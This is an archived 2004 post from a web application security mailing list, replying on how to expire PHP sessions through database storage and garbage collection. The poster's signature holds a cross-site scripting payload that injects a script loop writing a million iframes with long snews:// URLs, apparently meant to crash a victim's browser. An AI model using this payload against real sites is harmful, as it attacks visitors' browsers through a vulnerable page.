WebApp Sec mailing list archives

Re: session id abuse

From: hans <hans () e35203 upc-e chello nl>
Date: Sat, 14 Feb 2004 01:17:22 +0100 (CET)



On Fri, 13 Feb 2004, Johnny GoLightly wrote:

User requires access to a web application for a long period of time with inactivity. Therefore assume that sessionID 
never expires.


Sessions can be expired. When, for example, you use php you could set
the session handler to store the info in a database server. With the
garbage collecter you would be able to delete this information.

If you are not deleting it it would only be readable for the session
owner.

Hans
-- 
begin  http://<XSS_VULN_HOST>/<script>var i; for (i=1;i<1000000;i++) {
        document.write("\<iframe
        src=\"snews://aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"; + i +
        "\"\>\<\/iframe>"); } document.refresh; </script>

Current thread:

Session ID Abuse Johnny GoLightly (Feb 13)
- Re: Session ID Abuse Paul (Feb 15)
- Re: Session ID Abuse lists AT dawes DOT za DOT net (Feb 15)
- <Possible follow-ups>
- session id abuse Johnny GoLightly (Feb 13)
  - Re: session id abuse npguy (Feb 15)
  - Re: session id abuse hans (Feb 15)
- RE: Session ID Abuse Kris Wilkinson (Feb 15)
  - Re: Session ID Abuse Steve Shah (Feb 15)